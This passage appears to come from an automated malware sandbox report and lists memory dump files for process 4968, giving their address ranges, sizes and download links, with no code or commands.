            • memory/4968-137-0x0000000002350000-0x0000000002360000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4968-124-0x000000006FC80000-0x000000006FCCC000-memory.dmp

              Filesize

              304KB

              Download

            • memory/4968-75-0x0000000002350000-0x0000000002360000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4968-145-0x0000000007160000-0x0000000007174000-memory.dmp

              Filesize

              80KB

              Download

            • memory/4968-146-0x0000000007250000-0x000000000726A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4968-150-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download